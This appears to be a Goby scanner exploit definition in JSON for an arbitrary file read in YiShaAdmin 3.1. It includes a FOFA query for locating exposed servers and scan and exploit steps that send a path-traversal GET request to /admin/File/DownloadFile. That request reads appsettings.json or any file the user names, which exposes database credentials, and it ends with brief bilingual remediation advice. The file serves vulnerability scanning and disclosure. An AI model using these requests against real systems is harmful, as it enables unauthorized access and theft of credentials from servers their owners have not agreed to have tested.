{ "Name": "YiShaAdmin 3.1 Arbitrary File Read", "Description": "

YiShaAdmin is based on the .NET Core MVC permission management system. The code is easy to read and understand, and the interface is simple and beautiful.

Attackers can exploit the vulnerability to read arbitrary files, including database passwords. 

", "Product": "YiShaAdmin", "Homepage": "https://github.com/liukuo362573/YiShaAdmin", "DisclosureDate": "2022-03-23", "Author": "abszse", "FofaQuery": "body=\"/yisha/css/login.css\"", "GobyQuery": "body=\"/yisha/css/login.css\"", "Level": "2", "Impact": "

Attackers can exploit the vulnerability to read arbitrary files, including database passwords. 

", "References": [ "https://fofa.so/" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "appsettings.json", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/admin/File/DownloadFile?filePath=wwwroot/../appsettings.json&delete=0", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "Logging", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/admin/File/DownloadFile?filePath=wwwroot/../{{{cmd}}}&delete=0", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Arbitrary File Download" ], "VulType": [ "Arbitrary File Download" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "7.5", "Translation": { "CN": { "Name": "YiShaAdmin 管理系统 3.1 任意文件读取漏洞", "Product": "YiShaAdmin", "Description": "

YiShaAdmin 基于 .NET Core MVC 的权限管理系统,代码易读易懂、界面简洁美观。

攻击者可利用漏洞读取任意文件,包括数据库密码等。

", "Recommendation": "

对/admin/File/DownloadFile 设置鉴权

设置访问的白名单

修复请关注链接:https://github.com/liukuo362573/YiShaAdmin

", "Impact": "

攻击者可利用漏洞读取任意文件,包括数据库密码等。

", "VulType": [ "任意⽂件下载" ], "Tags": [ "任意⽂件下载" ] }, "EN": { "Name": "YiShaAdmin 3.1 Arbitrary File Read", "Product": "YiShaAdmin", "Description": "

YiShaAdmin is based on the .NET Core MVC permission management system. The code is easy to read and understand, and the interface is simple and beautiful.

Attackers can exploit the vulnerability to read arbitrary files, including database passwords. 

", "Recommendation": "

Set authentication to /admin/File/DownloadFile

Set a whitelist for access

Please follow the link for repair: https://github.com/liukuo362573/YiShaAdmin

", "Impact": "

Attackers can exploit the vulnerability to read arbitrary files, including database passwords. 

", "VulType": [ "Arbitrary File Download" ], "Tags": [ "Arbitrary File Download" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }